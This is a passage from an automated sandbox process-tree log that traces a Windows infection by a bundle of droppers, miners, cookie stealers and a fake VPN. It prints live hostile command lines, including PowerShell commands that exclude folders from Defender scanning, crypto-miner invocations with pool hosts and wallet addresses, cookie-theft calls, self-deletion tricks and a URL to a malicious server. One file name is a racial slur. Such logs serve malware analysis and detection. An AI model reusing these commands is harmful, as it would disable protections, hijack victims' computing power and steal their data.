C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\74196253713.exe"C:\Users\Admin\AppData\Local\Temp\{GeZW-Ot438-dWD2-vmN6q}\74196253713.exe" /mix16⤵PID:6924
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "nigger.exe" /f & erase "C:\Program Files (x86)\Versium Research\Versium Research\nigger.exe" & exit15⤵PID:7428
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "nigger.exe" /f16⤵
- Kills process with taskkill
PID:7300
-
-
-
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"11⤵PID:5468
-
C:\Users\Admin\AppData\Local\Temp\is-9C528.tmp\lylal220.tmp"C:\Users\Admin\AppData\Local\Temp\is-9C528.tmp\lylal220.tmp" /SL5="$10452,491750,408064,C:\Program Files (x86)\Versium Research\Versium Research\lylal220.exe"12⤵PID:5600
-
C:\Users\Admin\AppData\Local\Temp\is-USRFS.tmp\Microsoft.exe"C:\Users\Admin\AppData\Local\Temp\is-USRFS.tmp\Microsoft.exe" /S /UID=lylal22013⤵PID:1912
-
C:\Users\Admin\AppData\Local\Temp\5b-7051b-b21-515a6-9065c3a99c81a\Xenateqono.exe"C:\Users\Admin\AppData\Local\Temp\5b-7051b-b21-515a6-9065c3a99c81a\Xenateqono.exe"14⤵PID:3416
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ks4geiah.r3b\gaooo.exe & exit15⤵PID:5716
-
C:\Users\Admin\AppData\Local\Temp\ks4geiah.r3b\gaooo.exeC:\Users\Admin\AppData\Local\Temp\ks4geiah.r3b\gaooo.exe16⤵PID:7520
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:7592
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt17⤵PID:5484
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mo0s0tpe.xis\md7_7dfj.exe & exit15⤵PID:8036
-
C:\Users\Admin\AppData\Local\Temp\mo0s0tpe.xis\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\mo0s0tpe.xis\md7_7dfj.exe16⤵PID:6028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fh2bkfz1.xvq\customer6.exe & exit15⤵PID:7656
-
C:\Users\Admin\AppData\Local\Temp\fh2bkfz1.xvq\customer6.exeC:\Users\Admin\AppData\Local\Temp\fh2bkfz1.xvq\customer6.exe16⤵PID:7776
-
C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX5\main.exe"17⤵PID:7868
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\t0jlrvje.fmy\askinstall31.exe & exit15⤵PID:6656
-
C:\Users\Admin\AppData\Local\Temp\t0jlrvje.fmy\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\t0jlrvje.fmy\askinstall31.exe16⤵PID:3836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ubxtm1zz.1zs\HookSetp.exe & exit15⤵PID:7780
-
C:\Users\Admin\AppData\Local\Temp\ubxtm1zz.1zs\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\ubxtm1zz.1zs\HookSetp.exe16⤵PID:7100
-
C:\ProgramData\432522.exe"C:\ProgramData\432522.exe"17⤵PID:8400
-
-
C:\ProgramData\7171347.exe"C:\ProgramData\7171347.exe"17⤵PID:8432
-
-
C:\ProgramData\6455700.exe"C:\ProgramData\6455700.exe"17⤵PID:6088
-
-
C:\ProgramData\2355439.exe"C:\ProgramData\2355439.exe"17⤵PID:7600
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mtd2hdyn.pqw\GcleanerWW.exe /mixone & exit15⤵PID:7788
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x0aoqu0p.13r\19.exe & exit15⤵PID:7812
-
C:\Users\Admin\AppData\Local\Temp\x0aoqu0p.13r\19.exeC:\Users\Admin\AppData\Local\Temp\x0aoqu0p.13r\19.exe16⤵PID:7800
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javc\install.dll",install17⤵PID:5564
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ncexxzl5.mj3\b9706c20.exe & exit15⤵PID:8812
-
C:\Users\Admin\AppData\Local\Temp\ncexxzl5.mj3\b9706c20.exeC:\Users\Admin\AppData\Local\Temp\ncexxzl5.mj3\b9706c20.exe16⤵PID:8420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ejfqo5x0.km4\setup.exe /8-2222 & exit15⤵PID:8920
-
C:\Users\Admin\AppData\Local\Temp\ejfqo5x0.km4\setup.exeC:\Users\Admin\AppData\Local\Temp\ejfqo5x0.km4\setup.exe /8-222216⤵PID:7404
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Falling-Bird"17⤵PID:7916
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v3yzwupz.oj3\file.exe & exit15⤵PID:892
-
C:\Users\Admin\AppData\Local\Temp\v3yzwupz.oj3\file.exeC:\Users\Admin\AppData\Local\Temp\v3yzwupz.oj3\file.exe16⤵PID:8372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hsygg3th.sjm\setup.exe /S /kr /site_id=754 & exit15⤵PID:8008
-
C:\Users\Admin\AppData\Local\Temp\hsygg3th.sjm\setup.exeC:\Users\Admin\AppData\Local\Temp\hsygg3th.sjm\setup.exe /S /kr /site_id=75416⤵PID:8524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lv2axfh3.vp0\Four.exe & exit15⤵PID:7824
-
C:\Users\Admin\AppData\Local\Temp\lv2axfh3.vp0\Four.exeC:\Users\Admin\AppData\Local\Temp\lv2axfh3.vp0\Four.exe16⤵PID:8024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\c9-5e2e6-eca-0878f-6fc989847d9a6\Hafywapaku.exe"C:\Users\Admin\AppData\Local\Temp\c9-5e2e6-eca-0878f-6fc989847d9a6\Hafywapaku.exe"14⤵PID:6000
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 193615⤵PID:7556
-
-
-
C:\Program Files\Mozilla Firefox\GCCIMQGSIM\irecord.exe"C:\Program Files\Mozilla Firefox\GCCIMQGSIM\irecord.exe" /VERYSILENT14⤵PID:7152
-
-
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\RmSetp.exe"C:\Program Files (x86)\Versium Research\Versium Research\RmSetp.exe"11⤵PID:5500
-
C:\ProgramData\2645996.exe"C:\ProgramData\2645996.exe"12⤵PID:216
-
-
C:\ProgramData\2832862.exe"C:\ProgramData\2832862.exe"12⤵PID:4472
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"13⤵PID:5036
-
-
-
C:\ProgramData\8070925.exe"C:\ProgramData\8070925.exe"12⤵PID:4300
-
-
C:\ProgramData\8012226.exe"C:\ProgramData\8012226.exe"12⤵PID:3148
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\YiXjaRalM3qf.exe"C:\Program Files (x86)\Versium Research\Versium Research\YiXjaRalM3qf.exe"11⤵PID:5540
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe12⤵PID:5548
-
-
-
C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"11⤵PID:5372
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\zu1k3ry3ilo\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\zu1k3ry3ilo\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵PID:204
-
C:\Users\Admin\AppData\Local\Temp\is-ERHF7.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-ERHF7.tmp\IBInstaller_97039.tmp" /SL5="$10318,9884624,721408,C:\Users\Admin\AppData\Local\Temp\zu1k3ry3ilo\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵PID:3908
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://italyfabricone.club/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵PID:2468
-
-
C:\Users\Admin\AppData\Local\Temp\is-EGKA5.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-EGKA5.tmp\{app}\chrome_proxy.exe"10⤵PID:4036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\gjimdvlhknc\app.exe"C:\Users\Admin\AppData\Local\Temp\gjimdvlhknc\app.exe" /8-238⤵PID:1972
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Lively-Meadow"9⤵PID:4384
-
-
C:\Program Files (x86)\Lively-Meadow\7za.exe"C:\Program Files (x86)\Lively-Meadow\7za.exe" e -p154.61.71.51 winamp-plugins.7z9⤵PID:4456
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Lively-Meadow\app.exe" -map "C:\Program Files (x86)\Lively-Meadow\WinmonProcessMonitor.sys""9⤵PID:6488
-
C:\Program Files (x86)\Lively-Meadow\app.exe"C:\Program Files (x86)\Lively-Meadow\app.exe" -map "C:\Program Files (x86)\Lively-Meadow\WinmonProcessMonitor.sys"10⤵PID:6860
-
-
-
C:\Program Files (x86)\Lively-Meadow\7za.exe"C:\Program Files (x86)\Lively-Meadow\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:1144
-
-
C:\Program Files (x86)\Lively-Meadow\app.exe"C:\Program Files (x86)\Lively-Meadow\app.exe" /8-239⤵PID:4408
-
-
-
C:\Users\Admin\AppData\Local\Temp\omkphmrazz2\51uaqm3vsoh.exe"C:\Users\Admin\AppData\Local\Temp\omkphmrazz2\51uaqm3vsoh.exe" /1-6108⤵PID:4624
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Quiet-Fire'9⤵PID:4652
-
-
C:\Program Files (x86)\Quiet-Fire\7za.exe"C:\Program Files (x86)\Quiet-Fire\7za.exe" e -p154.61.71.51 winamp.7z9⤵PID:5552
-
-
C:\Program Files (x86)\Quiet-Fire\51uaqm3vsoh.exe"C:\Program Files (x86)\Quiet-Fire\51uaqm3vsoh.exe" /1-6109⤵PID:6892
-
-
-
C:\Users\Admin\AppData\Local\Temp\zlqqh0v1o3b\wctetzmednm.exe"C:\Users\Admin\AppData\Local\Temp\zlqqh0v1o3b\wctetzmednm.exe" /quiet SILENT=1 AF=7568⤵PID:2828
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=756 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zlqqh0v1o3b\wctetzmednm.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zlqqh0v1o3b\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1616437212 /quiet SILENT=1 AF=756 " AF="756" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912"9⤵PID:3676
-
-
-
C:\Users\Admin\AppData\Local\Temp\4mx3kb2hj1d\vpn.exe"C:\Users\Admin\AppData\Local\Temp\4mx3kb2hj1d\vpn.exe" /silent /subid=4828⤵PID:3012
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\04GZDDB8YR\setups.exe"C:\Users\Admin\AppData\Local\Temp\04GZDDB8YR\setups.exe" ll5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4628 -
C:\Users\Admin\AppData\Local\Temp\is-DOCSK.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-DOCSK.tmp\setups.tmp" /SL5="$4010A,383902,148480,C:\Users\Admin\AppData\Local\Temp\04GZDDB8YR\setups.exe" ll6⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"4⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:224 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
- Suspicious use of WriteProcessMemory
PID:5044 -
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3948
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2056
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"4⤵PID:4640
-
C:\Users\Admin\AppData\Roaming\E082.tmp.exe"C:\Users\Admin\AppData\Roaming\E082.tmp.exe"5⤵PID:2392
-
C:\Users\Admin\AppData\Roaming\E082.tmp.exe"C:\Users\Admin\AppData\Roaming\E082.tmp.exe"6⤵PID:184
-
-
-
C:\Users\Admin\AppData\Roaming\E69E.tmp.exe"C:\Users\Admin\AppData\Roaming\E69E.tmp.exe"5⤵PID:2244
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\E69E.tmp.exe"6⤵PID:7012
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK7⤵
- Delays execution with timeout.exe
PID:6756
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\f5723486..exe"C:\Users\Admin\AppData\Local\Temp\f5723486..exe"5⤵PID:5920
-
C:\Windows\system32\msiexec.exe-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 99996⤵PID:5128
-
-
C:\Windows\system32\msiexec.exe-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 999996⤵PID:2432
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"5⤵PID:4260
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4816
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"4⤵PID:5940
-
C:\ProgramData\6896461.exe"C:\ProgramData\6896461.exe"5⤵PID:4220
-
-
C:\ProgramData\7083327.exe"C:\ProgramData\7083327.exe"5⤵PID:5096
-
-
C:\ProgramData\3924640.exe"C:\ProgramData\3924640.exe"5⤵PID:412
-
-
C:\ProgramData\3709482.exe"C:\ProgramData\3709482.exe"5⤵PID:6240
-
-
C:\ProgramData\5935956.exe"C:\ProgramData\5935956.exe"5⤵PID:6260
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"4⤵PID:6324
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:6852
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt5⤵PID:4308
-
-
-
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4200
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:3416
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:4516
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:884
-
C:\Users\Admin\AppData\Local\Temp\is-3A727.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-3A727.tmp\vpn.tmp" /SL5="$10312,15170975,270336,C:\Users\Admin\AppData\Local\Temp\4mx3kb2hj1d\vpn.exe" /silent /subid=4821⤵PID:200
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "2⤵PID:3264
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09013⤵PID:4760
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "2⤵PID:6052
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09013⤵PID:5668
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall2⤵PID:4728
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install2⤵PID:7412
-
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵PID:3992
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 71F6D97279A7065C4C0A302496AB517F C2⤵PID:6020
-
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding 40044832A76FDE16F3B93224396C42CD2⤵PID:6428
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵PID:4656
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\is-7TN1O.tmp\LabPicV3.tmp"C:\Users\Admin\AppData\Local\Temp\is-7TN1O.tmp\LabPicV3.tmp" /SL5="$10448,239334,155648,C:\Program Files (x86)\Versium Research\Versium Research\LabPicV3.exe"1⤵PID:5516
-
C:\Users\Admin\AppData\Local\Temp\is-GE748.tmp\ppppppfy.exe"C:\Users\Admin\AppData\Local\Temp\is-GE748.tmp\ppppppfy.exe" /S /UID=lab2142⤵PID:4792
-
C:\Program Files\MSBuild\NELJIJNHSW\prolab.exe"C:\Program Files\MSBuild\NELJIJNHSW\prolab.exe" /VERYSILENT3⤵PID:6984
-
C:\Users\Admin\AppData\Local\Temp\is-LIT89.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-LIT89.tmp\prolab.tmp" /SL5="$303B2,575243,216576,C:\Program Files\MSBuild\NELJIJNHSW\prolab.exe" /VERYSILENT4⤵PID:7088
-
-
-
C:\Users\Admin\AppData\Local\Temp\24-0afbf-40e-9efb7-f06d088f1a8db\Salibylexe.exe"C:\Users\Admin\AppData\Local\Temp\24-0afbf-40e-9efb7-f06d088f1a8db\Salibylexe.exe"3⤵PID:7036
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lywkpv1y.b5u\gaooo.exe & exit4⤵PID:3944
-
C:\Users\Admin\AppData\Local\Temp\lywkpv1y.b5u\gaooo.exeC:\Users\Admin\AppData\Local\Temp\lywkpv1y.b5u\gaooo.exe5⤵PID:7372
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:5244
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:2712
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\12tsfqwk.zxo\md7_7dfj.exe & exit4⤵PID:5200
-
C:\Users\Admin\AppData\Local\Temp\12tsfqwk.zxo\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\12tsfqwk.zxo\md7_7dfj.exe5⤵PID:7608
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2jau3p0k.ftr\customer6.exe & exit4⤵PID:4324
-
C:\Users\Admin\AppData\Local\Temp\2jau3p0k.ftr\customer6.exeC:\Users\Admin\AppData\Local\Temp\2jau3p0k.ftr\customer6.exe5⤵PID:7092
-
C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX4\main.exe"6⤵PID:6508
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f5v3relc.enh\askinstall31.exe & exit4⤵PID:6068
-
C:\Users\Admin\AppData\Local\Temp\f5v3relc.enh\askinstall31.exeC:\Users\Admin\AppData\Local\Temp\f5v3relc.enh\askinstall31.exe5⤵PID:5512
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:6396
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:8328
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\pygqk1po.wat\HookSetp.exe & exit4⤵PID:8096
-
C:\Users\Admin\AppData\Local\Temp\pygqk1po.wat\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\pygqk1po.wat\HookSetp.exe5⤵PID:7072
-
C:\ProgramData\8092085.exe"C:\ProgramData\8092085.exe"6⤵PID:8300
-
-
C:\ProgramData\6807186.exe"C:\ProgramData\6807186.exe"6⤵PID:8348
-
-
C:\ProgramData\3521037.exe"C:\ProgramData\3521037.exe"6⤵PID:8580
-
-
C:\ProgramData\4934103.exe"C:\ProgramData\4934103.exe"6⤵PID:8804
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\n1i5ryaq.obt\GcleanerWW.exe /mixone & exit4⤵PID:6500
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\34icalai.mui\19.exe & exit4⤵PID:7480
-
C:\Users\Admin\AppData\Local\Temp\34icalai.mui\19.exeC:\Users\Admin\AppData\Local\Temp\34icalai.mui\19.exe5⤵PID:6140
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\javc\install.dll",install6⤵PID:7440
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fe-3a002-4dc-3b983-bc4ce10ecb3c1\Nixuhakidae.exe"C:\Users\Admin\AppData\Local\Temp\fe-3a002-4dc-3b983-bc4ce10ecb3c1\Nixuhakidae.exe"3⤵PID:7020
-
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 24364⤵PID:9180
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-3LGC4.tmp\irecord.tmp"C:\Users\Admin\AppData\Local\Temp\is-3LGC4.tmp\irecord.tmp" /SL5="$20448,6265333,408064,C:\Program Files\Mozilla Firefox\GCCIMQGSIM\irecord.exe" /VERYSILENT1⤵PID:6004
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall1⤵PID:6036
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{3e428bd6-5bd9-384f-ad42-2266713d5c5e}\oemvista.inf" "9" "4d14a44ff" "0000000000000180" "WinSta0\Default" "0000000000000184" "208" "c:\program files (x86)\maskvpn\driver\win764"2⤵PID:6412
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "000000000000017C"2⤵PID:6156
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc1⤵PID:3504
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵PID:3972
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe"1⤵PID:7120
-
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exeMaskVPNUpdate.exe /silent2⤵PID:4684
-
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\0b25fb9fa9af4102b56e6ad14725e52c /t 1940 /p 54921⤵PID:8452
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:7304